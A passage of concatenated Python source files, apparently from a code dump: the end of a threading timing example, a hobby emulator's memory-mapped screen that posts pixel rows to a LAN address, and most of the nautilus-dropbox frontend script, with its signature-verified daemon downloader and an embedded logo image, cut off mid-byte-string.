t2 = threading.Thread(target=do_something)
t1.start()
t2.start()
t1.join()
t2.join()
finish = time.perf_counter()
print(f'\nFinished in {round(finish-start, 2)} seconds')
|
MemMappedRemoteScreen.py
|
import urllib
import BinLib
from PIL import Image
from threading import Thread
RAM = [16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32]
"""
RAM for screen
Memory mapped each cell is one row of pixels
"""
buffer = Image.new("L",(16,16))
def screen():
global buffer
while True:
for x in xrange(16):
#print RAM[x],ram.read(RAM[x])
line = ""
for y in xrange(16):
if buffer.getpixel((y,x)) == 255:
line = line + "1"
else:
line = line + "0"
try:
urllib.urlopen("http://192.168.1.74:8000/?line="+line+"&row="+str(x))
except:
pass
class MemMappedRemoteScreen:
def __init__(self):
self.url = "192.168.1.74:8000"
self.TickTime = 0
self.currentTick = 0
self.screenThread = Thread(target=screen)
self.screenThread.start()
def tick(self,ram,prom):
for x in xrange(0,16):
#print RAM[x],ram.read(RAM[x])
q = BinLib.toTwoComp(ram.read(RAM[x]))
for y in xrange(16):
buffer.putpixel((y,x),255*int(q[y]))
def CleanUp(self):
pass
|
dropbox.py
|
#!/usr/bin/python
#
# Copyright (c) Dropbox, Inc.
#
# dropbox
# Dropbox frontend script
# This file is part of nautilus-dropbox 1.6.2.
#
# nautilus-dropbox is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# nautilus-dropbox is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with nautilus-dropbox. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import with_statement
import errno
import locale
import optparse
import os
import platform
import shutil
import socket
import StringIO
import subprocess
import sys
import tarfile
import tempfile
import threading
import thread
import time
import traceback
import urllib2
try:
import gpgme
except ImportError:
gpgme = None
from contextlib import closing, contextmanager
from posixpath import curdir, sep, pardir, join, abspath, commonprefix
INFO = u"Dropbox is the easiest way to share and store your files online. Want to learn more? Head to"
LINK = u"https://www.dropbox.com/"
WARNING = u"In order to use Dropbox, you must download the proprietary daemon."
GPG_WARNING = u"Note: python-gpgme is not installed, we will not be able to verify binary signatures."
ERROR_CONNECTING = u"Trouble connecting to Dropbox servers. Maybe your internet connection is down, or you need to set your http_proxy environment variable."
ERROR_SIGNATURE = u"Downloaded binary does not match Dropbox signature, aborting install."
DOWNLOAD_LOCATION_FMT = "https://www.dropbox.com/download?plat=%s"
SIGNATURE_LOCATION_FMT = "https://www.dropbox.com/download?plat=%s&signature=1"
DOWNLOADING = u"Downloading Dropbox... %d%%"
UNPACKING = u"Unpacking Dropbox... %d%%"
PARENT_DIR = os.path.expanduser("~")
DROPBOXD_PATH = "%s/.dropbox-dist/dropboxd" % PARENT_DIR
DESKTOP_FILE = u"/usr/share/applications/dropbox.desktop"
enc = locale.getpreferredencoding()
# Available from https://linux.dropbox.com/fedora/rpm-public-key.asc
DROPBOX_PUBLIC_KEY = """
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: SKS 1.1.0
mQENBEt0ibEBCACv4hZRPqwtpU6z8+BB5YZU1a3yjEvg2W68+a6hEwxtCa2U++4dzQ+7EqaU
q5ybQnwtbDdpFpsOi9x31J+PCpufPUfIG694/0rlEpmzl2GWzY8NqfdBFGGm/SPSSwvKbeNc
FMRLu5neo7W9kwvfMbGjHmvUbzBUVpCVKD0OEEf1q/Ii0Qcekx9CMoLvWq7ZwNHEbNnij7ec
nvwNlE2MxNsOSJj+hwZGK+tM19kuYGSKw4b5mR8IyThlgiSLIfpSBh1n2KX+TDdk9GR+57TY
vlRu6nTPu98P05IlrrCP+KF0hYZYOaMvQs9Rmc09tc/eoQlN0kkaBWw9Rv/dvLVc0aUXABEB
AAG0MURyb3Bib3ggQXV0b21hdGljIFNpZ25pbmcgS2V5IDxsaW51eEBkcm9wYm94LmNvbT6J
ATYEEwECACAFAkt0ibECGwMGCwkIBwMCBBUCCAMEFgIDAQIeAQIXgAAKCRD8kYszUESRLi/z
B/wMscEa15rS+0mIpsORknD7kawKwyda+LHdtZc0hD/73QGFINR2P23UTol/R4nyAFEuYNsF
0C4IAD6y4pL49eZ72IktPrr4H27Q9eXhNZfJhD7BvQMBx75L0F5gSQwuC7GdYNlwSlCD0AAh
Qbi70VBwzeIgITBkMQcJIhLvllYo/AKD7Gv9huy4RLaIoSeofp+2Q0zUHNPl/7zymOqu+5Ox
e1ltuJT/kd/8hU+N5WNxJTSaOK0sF1/wWFM6rWd6XQUP03VyNosAevX5tBo++iD1WY2/lFVU
JkvAvge2WFk3c6tAwZT/tKxspFy4M/tNbDKeyvr685XKJw9ei6GcOGHD
=5rWG
-----END PGP PUBLIC KEY BLOCK-----
"""
# Futures
def methodcaller(name, *args, **kwargs):
def caller(obj):
return getattr(obj, name)(*args, **kwargs)
return caller
def relpath(path, start=curdir):
"""Return a relative version of a path"""
if not path:
raise ValueError("no path specified")
if type(start) is unicode:
start_list = unicode_abspath(start).split(sep)
else:
start_list = abspath(start).split(sep)
if type(path) is unicode:
path_list = unicode_abspath(path).split(sep)
else:
path_list = abspath(path).split(sep)
# Work out how much of the filepath is shared by start and path.
i = len(commonprefix([start_list, path_list]))
rel_list = [pardir] * (len(start_list)-i) + path_list[i:]
if not rel_list:
return curdir
return join(*rel_list)
# End Futures
def console_print(st=u"", f=sys.stdout, linebreak=True):
global enc
assert type(st) is unicode
f.write(st.encode(enc))
if linebreak: f.write(os.linesep)
def console_flush(f=sys.stdout):
f.flush()
def yes_no_question(question):
while True:
console_print(question, linebreak=False)
console_print(u" [y/n] ", linebreak=False)
console_flush()
text = raw_input()
if text.lower().startswith("y"):
return True
elif text.lower().startswith("n"):
return False
else:
console_print(u"Sorry, I didn't understand that. Please type yes or no.")
def plat():
if sys.platform.lower().startswith('linux'):
arch = platform.machine()
if (arch[0] == 'i' and
arch[1].isdigit() and
arch[2:4] == '86'):
plat = "x86"
elif arch == 'x86_64':
plat = arch
else:
FatalVisibleError("Platform not supported")
return "lnx.%s" % plat
else:
FatalVisibleError("Platform not supported")
def is_dropbox_running():
pidfile = os.path.expanduser("~/.dropbox/dropbox.pid")
try:
with open(pidfile, "r") as f:
pid = int(f.read())
with open("/proc/%d/cmdline" % pid, "r") as f:
cmdline = f.read().lower()
except:
cmdline = ""
return "dropbox" in cmdline
def unicode_abspath(path):
global enc
assert type(path) is unicode
# shouldn't pass unicode to this craphead, it appends with os.getcwd() which is always a str
return os.path.abspath(path.encode(sys.getfilesystemencoding())).decode(sys.getfilesystemencoding())
@contextmanager
def gpgme_context(keys):
gpg_conf_contents = ''
_gpghome = tempfile.mkdtemp(prefix='tmp.gpghome')
try:
os.environ['GNUPGHOME'] = _gpghome
fp = open(os.path.join(_gpghome, 'gpg.conf'), 'wb')
fp.write(gpg_conf_contents)
fp.close()
ctx = gpgme.Context()
loaded = []
for key_file in keys:
result = ctx.import_(key_file)
key = ctx.get_key(result.imports[0][0])
loaded.append(key)
ctx.signers = loaded
yield ctx
finally:
del os.environ['GNUPGHOME']
shutil.rmtree(_gpghome, ignore_errors=True)
class SignatureVerifyError(Exception):
pass
def verify_signature(key_file, sig_file, plain_file):
with gpgme_context([key_file]) as ctx:
sigs = ctx.verify(sig_file, plain_file, None)
return sigs[0].status == None
def download_file_chunk(url, buf):
opener = urllib2.build_opener()
opener.addheaders = [('User-Agent', "DropboxLinuxDownloader/1.6.2")]
sock = opener.open(url)
size = int(sock.info()['content-length'])
bufsize = max(size / 200, 4096)
progress = 0
with closing(sock) as f:
yield (0, True)
while True:
try:
chunk = f.read(bufsize)
progress += len(chunk)
buf.write(chunk)
yield (float(progress)/size, True)
if progress == size:
break
except OSError, e:
if hasattr(e, 'errno') and e.errno == errno.EAGAIN:
# nothing left to read
yield (float(progress)/size, False)
else:
raise
class DownloadState(object):
def __init__(self):
self.local_file = StringIO.StringIO()
def copy_data(self):
return download_file_chunk(DOWNLOAD_LOCATION_FMT % plat(), self.local_file)
def unpack(self):
# download signature
signature = StringIO.StringIO()
for _ in download_file_chunk(SIGNATURE_LOCATION_FMT % plat(), signature):
pass
signature.seek(0)
self.local_file.seek(0)
if gpgme:
if not verify_signature(StringIO.StringIO(DROPBOX_PUBLIC_KEY), signature, self.local_file):
raise SignatureVerifyError()
self.local_file.seek(0)
archive = tarfile.open(fileobj=self.local_file, mode='r:gz')
total_members = len(archive.getmembers())
for i, member in enumerate(archive.getmembers()):
archive.extract(member, PARENT_DIR)
yield member.name, i, total_members
archive.close()
def cancel(self):
if not self.local_file.closed:
self.local_file.close()
def load_serialized_images():
global box_logo_pixbuf, window_icon
import gtk
box_logo_pixbuf = gtk.gdk.pixbuf_new_from_data('\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\xff\xff\xff\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x08\x00\\\x9ef\x00\\\x9ej\x00\\\x9e\x04\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9eZ\x00[\x9er\x00\\\x9e\x14\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e8\x00Y\x9c\xc2\x00X\x9b\xff\x00X\x9b\xff\x00[\x9d\xaa\x00\\\x9e\r\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x02\x00\\\x9e\x8e\x00Y\x9b\xff\x00Y\x9b\xff\x00Y\x9b\xd5\x00\\\x9eM\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x12\x00[\x9d\x8b\x00U\x99\xfa\x0fe\xa5\xff]\xa2\xd3\xffM\x95\xc9\xff\x00X\x9b\xff\x00Y\x9c\xc9\x00\\\x9e\x1e\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x0f\x00[\x9d\xb1\x00V\x99\xff4\x85\xc1\xffZ\xa3\xda\xff\x17m\xab\xff\x00V\x99\xff\x00Z\x9d\xa2\x00\\\x9e \x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\\\x00W\x9a\xde\x00Y\x9c\xff:\x87\xbf\xff\x83\xbf\xeb\xff\x98\xce\xf6\xff\x9b\xd0\xf6\xffa\xa3\xd3\xff\x05]\x9e\xff\x00X\x9b\xda\x00\\\x9e/\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x1c\x00Z\x9c\xc5\x01Y\x9b\xff?\x90\xca\xff|\xc1\xf4\xff\x82\xc4\xf6\xff}\xbf\xf0\xffD\x90\xc8\xff\x05]\x9e\xff\x00V\x9a\xed\x00\\\x9es\x00\\\x9e\x07\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e4\x00Z\x9c\xba\x00V\x99\xff\x1dq\xae\xffd\xaa\xdd\xff\x8e\xc9\xf5\xff\x8e\xc7\xf3\xff\x8f\xc7\xf1\xff\x92\xc9\xf1\xff\xa1\xd2\xf6\xffw\xb3\xde\xff\x0fd\xa3\xff\x00V\x9a\xed\x00\\\x9eL\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e4\x00X\x9b\xdd\x05^\x9f\xffM\x9d\xd6\xffy\xc1\xf6\xffw\xbe\xf2\xffz\xbe\xf1\xff\x80\xc1\xf2\xff\x89\xc8\xf6\xffq\xb3\xe3\xff*z\xb5\xff\x00W\x9a\xff\x00X\x9b\xcd\x00\\\x9eG\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x0e\x00[\x9d\x86\x00V\x99\xfa\x0cc\xa4\xffK\x96\xce\xff\x81\xc2\xf2\xff\x89\xc7\xf5\xff\x87\xc4\xf1\xff\x8b\xc5\xf1\xff\x8f\xc7\xf1\xff\x92\xc9\xf1\xff\x97\xcb\xf1\xff\xa4\xd3\xf6\xff\x85\xbb\xe4\xff\x18k\xa8\xff\x00U\x99\xfc\x00\\\x9en\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9eS\x00W\x9a\xf1\x0bb\xa3\xffT\xa3\xdd\xffv\xc0\xf7\xffr\xbb\xf1\xffv\xbd\xf1\xffz\xbe\xf1\xff~\xc0\xf1\xff\x81\xc2\xf1\xff\x8a\xc7\xf4\xff\x8f\xc9\xf4\xff`\xa3\xd5\xff\x15i\xa8\xff\x00U\x98\xff\x00[\x9d\x9c\x00\\\x9e\x1a\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9eU\x00X\x9b\xd9\x00Z\x9c\xff1\x83\xbf\xffp\xb6\xea\xff\x84\xc5\xf6\xff\x80\xc2\xf2\xff\x83\xc2\xf1\xff\x87\xc4\xf1\xff\x8b\xc5\xf1\xff\x8f\xc7\xf1\xff\x92\xc9\xf1\xff\x97\xcb\xf1\xff\x9b\xcc\xf1\xff\xa6\xd3\xf5\xff\x96\xc7\xeb\xff*y\xb2\xff\x00T\x98\xff\x00\\\x9e\x90\x00\\\x9e\x02\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9eu\x00V\x99\xfe\x14k\xac\xff\\\xac\xe6\xffr\xbd\xf6\xffo\xba\xf1\xffr\xbb\xf1\xffv\xbd\xf1\xffz\xbe\xf1\xff~\xc0\xf1\xff\x81\xc2\xf1\xff\x85\xc3\xf1\xff\x8b\xc5\xf1\xff\x95\xcc\xf6\xff\x8c\xc5\xee\xffH\x90\xc5\xff\x04]\x9e\xff\x00V\x9a\xe7\x00\\\x9ej\x00\\\x9e\x03\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e.\x00Z\x9c\xb3\x00V\x99\xff\x17m\xad\xffV\xa3\xdc\xff{\xc2\xf6\xff|\xbf\xf3\xff|\xbf\xf1\xff\x7f\xc1\xf1\xff\x83\xc2\xf1\xff\x87\xc4\xf1\xff\x8b\xc5\xf1\xff\x8f\xc7\xf1\xff\x92\xc9\xf1\xff\x97\xcb\xf1\xff\x9b\xcc\xf1\xff\x9e\xcd\xf1\xff\xa6\xd3\xf4\xff\xa4\xd1\xf1\xff@\x88\xbd\xff\x00U\x99\xff\x00[\x9d\xb0\x00\\\x9e\x0c\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x02\x00[\x9d\x97\x00V\x98\xff\x1fv\xb6\xffa\xb1\xed\xffl\xbb\xf4\xffl\xb8\xf1\xffo\xba\xf1\xffr\xbb\xf1\xffv\xbd\xf1\xffz\xbe\xf1\xff~\xc0\xf1\xff\x81\xc2\xf1\xff\x85\xc3\xf1\xff\x8a\xc5\xf1\xff\x8d\xc6\xf1\xff\x93\xcb\xf2\xff\x9e\xd1\xf6\xff|\xb7\xe1\xff(w\xb2\xff\x00U\x99\xff\x00Y\x9c\xc6\x00\\\x9e?\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x0b\x00[\x9e\x86\x00V\x99\xf6\ta\xa2\xff=\x8f\xcc\xffm\xb9\xf1\xffu\xbf\xf5\xfft\xbc\xf1\xffy\xbd\xf1\xff|\xbf\xf1\xff\x7f\xc1\xf1\xff\x83\xc2\xf1\xff\x87\xc4\xf1\xff\x8b\xc5\xf1\xff\x8f\xc7\xf1\xff\x92\xc9\xf1\xff\x97\xcb\xf1\xff\x9b\xcc\xf1\xff\x9e\xcd\xf1\xff\xa1\xcf\xf1\xff\xa8\xd3\xf3\xff\xae\xd8\xf4\xffX\x99\xc9\xff\x00X\x9b\xff\x00Y\x9c\xc2\x00\\\x9e\x1b\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\r\x00[\x9d\xab\x00W\x99\xff,\x82\xc1\xffe\xb5\xf2\xffh\xb7\xf3\xffh\xb7\xf1\xffl\xb8\xf1\xffo\xba\xf1\xffr\xbb\xf1\xffv\xbd\xf1\xffz\xbe\xf1\xff~\xc0\xf1\xff\x81\xc2\xf1\xff\x85\xc3\xf1\xff\x8a\xc5\xf1\xff\x8d\xc6\xf1\xff\x90\xc9\xf1\xff\x95\xca\xf1\xff\x9f\xd1\xf5\xff\xa0\xcf\xf3\xffe\xa3\xd1\xff\x12f\xa5\xff\x00U\x98\xff\x00[\x9d\x9b\x00\\\x9e\x16\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9eN\x00Y\x9b\xd3\x00Y\x9c\xff\'}\xbc\xff]\xad\xe8\xffp\xbe\xf6\xffn\xba\xf2\xffp\xba\xf1\xfft\xbc\xf1\xffy\xbd\xf1\xff|\xbf\xf1\xff\x7f\xc1\xf1\xff\x83\xc2\xf1\xff\x87\xc4\xf1\xff\x8b\xc5\xf1\xff\x8f\xc7\xf1\xff\x92\xc9\xf1\xff\x97\xcb\xf1\xff\x9b\xcc\xf1\xff\x9e\xcd\xf1\xff\xa1\xcf\xf1\xff\xa5\xd1\xf1\xff\xa9\xd4\xf2\xff\xb5\xdb\xf6\xffq\xaa\xd4\xff\x04[\x9e\xff\x00X\x9b\xdc\x00\\\x9e>\x00\\\x9e0\x00Z\x9c\xc9\x00Z\x9b\xff8\x8d\xcd\xffe\xb7\xf5\xffc\xb4\xf2\xffe\xb5\xf1\xffh\xb7\xf1\xffl\xb8\xf1\xffo\xba\xf1\xffr\xbb\xf1\xffv\xbd\xf1\xffz\xbe\xf1\xff~\xc0\xf1\xff\x81\xc2\xf1\xff\x85\xc3\xf1\xff\x8a\xc5\xf1\xff\x8d\xc6\xf1\xff\x90\xc9\xf1\xff\x95\xca\xf1\xff\x99\xcc\xf1\xff\x9d\xce\xf2\xff\xa9\xd5\xf6\xff\x99\xc9\xec\xffI\x8e\xc1\xff\x03[\x9d\xff\x00V\x9a\xe1\x00\\\x9ea\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e\x00\x00\\\x9e(\x00[\x9d\xab\x00V\x98\xff\x13j\xab\xffK\x9e\xdc\xffi\xb9\xf6\xffj\xb8\xf3\xffj\xb8\xf1\xffm\xb9\xf1\xffp\xba\xf1\xfft\xbc\xf1\xffy\xbd\xf1\xff|\xbf\xf1\xff\x7f\xc1\xf1\xff\x83\xc2\xf1\xff\x87\xc4\xf1\xff\x8b\xc5\xf1\xff\x8f\xc7\xf1\xff\x92\xc9\xf1\xff\x97\xcb\xf1\xff\x9b\xcc\xf1\xff\x9e\xcd\xf1\xff\xa1\xcf\xf1\xff\xa5\xd1\xf1\xff\xa7\xd3\xf1\xff\xaa\xd4\xf1\xff\xb9\xdc\xf6\xff\x80\xb5\xda\xff\rb\xa2\xff\x00W\x9a\xff\x00Y\x9b\xfe\x04]\x9f\xff>\x94\x